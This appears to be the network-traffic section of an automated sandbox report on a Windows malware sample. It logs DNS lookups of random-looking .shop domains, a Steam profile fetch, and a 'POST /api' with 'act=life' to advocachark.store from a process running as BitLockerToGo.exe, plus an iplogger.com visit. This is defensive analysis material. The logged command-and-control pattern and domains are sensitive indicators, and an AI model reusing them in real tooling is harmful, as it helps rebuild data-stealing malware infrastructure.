                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.877017021 CEST5232153192.168.2.61.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.883966923 CEST53600341.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.885588884 CEST53523211.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.410794020 CEST5197653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.411288977 CEST5820853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.418250084 CEST53519761.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.418263912 CEST53582081.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:39.284915924 CEST53593101.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:58.303406000 CEST53612701.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:19.928312063 CEST53578151.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:21.167985916 CEST53580621.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:21.621778965 CEST4918853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:21.621849060 CEST5668653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:21.628532887 CEST53491881.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:21.629045963 CEST53566861.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:48.676996946 CEST53636671.1.1.1192.168.2.6

                                                                                                                                                                                                                                                DNS Queries

                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.280761957 CEST192.168.2.61.1.1.10xc9b0Standard query (0)branchtriviawlek.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.295245886 CEST192.168.2.61.1.1.10xad75Standard query (0)racedsuitreow.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.308396101 CEST192.168.2.61.1.1.10x92feStandard query (0)defenddsouneuw.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.319366932 CEST192.168.2.61.1.1.10x2fStandard query (0)deallyharvenw.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.330985069 CEST192.168.2.61.1.1.10x5d60Standard query (0)priooozekw.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.341243029 CEST192.168.2.61.1.1.10x5b03Standard query (0)pumpkinkwquo.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.352942944 CEST192.168.2.61.1.1.10x6057Standard query (0)abortinoiwiam.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.363755941 CEST192.168.2.61.1.1.10x4f85Standard query (0)surroundeocw.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.375637054 CEST192.168.2.61.1.1.10x141fStandard query (0)covvercilverow.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.386789083 CEST192.168.2.61.1.1.10xb2d3Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.726466894 CEST192.168.2.61.1.1.10x8334Standard query (0)advocachark.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.240343094 CEST192.168.2.61.1.1.10x306cStandard query (0)iplogger.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.240695953 CEST192.168.2.61.1.1.10xe1b0Standard query (0)iplogger.com65IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.619370937 CEST192.168.2.61.1.1.10x5934Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.620413065 CEST192.168.2.61.1.1.10x9c3dStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.176002026 CEST192.168.2.61.1.1.10xcc1dStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.176155090 CEST192.168.2.61.1.1.10x91abStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.198301077 CEST192.168.2.61.1.1.10x24abStandard query (0)iplogger.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.198613882 CEST192.168.2.61.1.1.10xf8dfStandard query (0)iplogger.com65IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.653476954 CEST192.168.2.61.1.1.10xa053Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.653631926 CEST192.168.2.61.1.1.10xfdf7Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.876797915 CEST192.168.2.61.1.1.10xbd2cStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.877017021 CEST192.168.2.61.1.1.10x5229Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.410794020 CEST192.168.2.61.1.1.10xcc0dStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.411288977 CEST192.168.2.61.1.1.10xf1d4Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:21.621778965 CEST192.168.2.61.1.1.10xbe22Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:21.621849060 CEST192.168.2.61.1.1.10x5361Standard query (0)a.nel.cloudflare.com65IN (0x0001)false

                                                                                                                                                                                                                                                DNS Answers

                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.290560007 CEST1.1.1.1192.168.2.60xc9b0Name error (3)branchtriviawlek.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.305035114 CEST1.1.1.1192.168.2.60xad75Name error (3)racedsuitreow.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.317995071 CEST1.1.1.1192.168.2.60x92feName error (3)defenddsouneuw.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.329556942 CEST1.1.1.1192.168.2.60x2fName error (3)deallyharvenw.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.340147018 CEST1.1.1.1192.168.2.60x5d60Name error (3)priooozekw.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.350275993 CEST1.1.1.1192.168.2.60x5b03Name error (3)pumpkinkwquo.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.362502098 CEST1.1.1.1192.168.2.60x6057Name error (3)abortinoiwiam.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.373507977 CEST1.1.1.1192.168.2.60x4f85Name error (3)surroundeocw.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.385386944 CEST1.1.1.1192.168.2.60x141fName error (3)covvercilverow.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.396269083 CEST1.1.1.1192.168.2.60xb2d3No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.739311934 CEST1.1.1.1192.168.2.60x8334No error (0)advocachark.store104.21.42.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.739311934 CEST1.1.1.1192.168.2.60x8334No error (0)advocachark.store172.67.166.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.249994040 CEST1.1.1.1192.168.2.60x306cNo error (0)iplogger.com172.67.188.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.249994040 CEST1.1.1.1192.168.2.60x306cNo error (0)iplogger.com104.21.76.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.250003099 CEST1.1.1.1192.168.2.60xe1b0No error (0)iplogger.com65IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.626241922 CEST1.1.1.1192.168.2.60x5934No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.183535099 CEST1.1.1.1192.168.2.60xcc1dNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.183535099 CEST1.1.1.1192.168.2.60xcc1dNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.184418917 CEST1.1.1.1192.168.2.60x91abNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.206382036 CEST1.1.1.1192.168.2.60x24abNo error (0)iplogger.com104.21.76.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.206382036 CEST1.1.1.1192.168.2.60x24abNo error (0)iplogger.com172.67.188.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.208780050 CEST1.1.1.1192.168.2.60xf8dfNo error (0)iplogger.com65IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.660455942 CEST1.1.1.1192.168.2.60xa053No error (0)www.google.com142.250.186.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.660506010 CEST1.1.1.1192.168.2.60xfdf7No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.883966923 CEST1.1.1.1192.168.2.60xbd2cNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.883966923 CEST1.1.1.1192.168.2.60xbd2cNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.885588884 CEST1.1.1.1192.168.2.60x5229No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.418250084 CEST1.1.1.1192.168.2.60xcc0dNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.418250084 CEST1.1.1.1192.168.2.60xcc0dNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.418263912 CEST1.1.1.1192.168.2.60xf1d4No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:21.628532887 CEST1.1.1.1192.168.2.60xbe22No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                                                                                • slscr.update.microsoft.com
                                                                                                                                                                                                                                                • steamcommunity.com
                                                                                                                                                                                                                                                • advocachark.store
                                                                                                                                                                                                                                                • iplogger.com
                                                                                                                                                                                                                                                • a.nel.cloudflare.com
                                                                                                                                                                                                                                                • https:
                                                                                                                                                                                                                                                  • challenges.cloudflare.com
                                                                                                                                                                                                                                                • fs.microsoft.com

                                                                                                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                0192.168.2.6496994.175.87.197443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 14:09:16 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=KGDWMUGzXSzGHLb&MD=tbZlVl+h HTTP/1.1
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                2024-10-03 14:09:16 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                Expires: -1
                                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                                                                MS-CorrelationId: b105af57-62b5-40bd-a45a-e311143abba4
                                                                                                                                                                                                                                                MS-RequestId: 59bd6955-ca56-46b6-8201-718191387663
                                                                                                                                                                                                                                                MS-CV: tCIgpMZEHUmyxVoZ.0
                                                                                                                                                                                                                                                X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                                                                Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 14:09:15 GMT
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Content-Length: 24490
                                                                                                                                                                                                                                                2024-10-03 14:09:16 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                                                                Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                                                                2024-10-03 14:09:16 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                                                                Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                1192.168.2.649705104.102.49.2544434368C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 14:09:18 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Host: steamcommunity.com
                                                                                                                                                                                                                                                2024-10-03 14:09:18 UTC1870INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 14:09:18 GMT
                                                                                                                                                                                                                                                Content-Length: 34837
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Set-Cookie: sessionid=e9969dc44f782eb86bef39e0; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                2024-10-03 14:09:18 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                                                                                                2024-10-03 14:09:18 UTC16384INData Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f
                                                                                                                                                                                                                                                Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
                                                                                                                                                                                                                                                2024-10-03 14:09:18 UTC3768INData Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                                                                                                                                                                Data Ascii: <div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
                                                                                                                                                                                                                                                2024-10-03 14:09:18 UTC171INData Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                2192.168.2.649707104.21.42.2104434368C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 14:09:19 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                                Host: advocachark.store
                                                                                                                                                                                                                                                2024-10-03 14:09:19 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                Data Ascii: act=life
                                                                                                                                                                                                                                                2024-10-03 14:09:19 UTC803INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 14:09:19 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=fsc1jv93fic32380k8tuo7oc8p; expires=Mon, 27 Jan 2025 07:55:58 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PVg8icSSCnLGJPsZoT7P%2BQj%2F7AKYeWODZPkxPbVHGMFHjV%2BY%2BhzIYC86umMECB7NU0Q%2Fd9mWkztwzCbA3213DWrDayd9jycrBX5H4vkTckxC7de0JjHA2ArvOSim2U%2FXmypSKA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccd825fa8d74235-EWR
                                                                                                                                                                                                                                                2024-10-03 14:09:19 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                                Data Ascii: aerror #D12
                                                                                                                                                                                                                                                2024-10-03 14:09:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                3192.168.2.649714172.67.188.1784436088C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 14:09:21 UTC661OUTGET /1KhnJ4 HTTP/1.1
                                                                                                                                                                                                                                                Host: iplogger.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: navigate
